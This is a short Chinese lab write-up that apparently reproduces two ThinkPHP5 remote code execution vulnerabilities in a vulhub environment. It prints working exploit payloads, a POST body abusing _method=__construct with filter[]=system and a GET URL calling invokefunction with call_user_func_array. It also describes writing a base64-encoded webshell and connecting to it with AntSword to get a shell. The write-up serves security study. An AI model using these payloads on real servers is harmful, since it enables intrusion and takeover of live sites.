thinkphp框架漏洞
thinkphp5 5.0.23 远程代码执行漏洞
进入vulhub靶场,启动环境。访问http://ip:8080测试靶场是否正常启动

使用hcakbar工具,构造payload,构造完毕后点击Execute
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=

命令执行成功
使用phpinfo验证漏洞

写入一句话木马,一句话木马要进行base64编码


进入容器,查看木马文件是否写入

然后使用蚁剑连接

成功getshell
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
进入vulhub靶场。启动环境

http://192.168.116.166:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

代码执行成功说明存在远程代码执行漏洞

待更新

浙公网安备 33010602011771号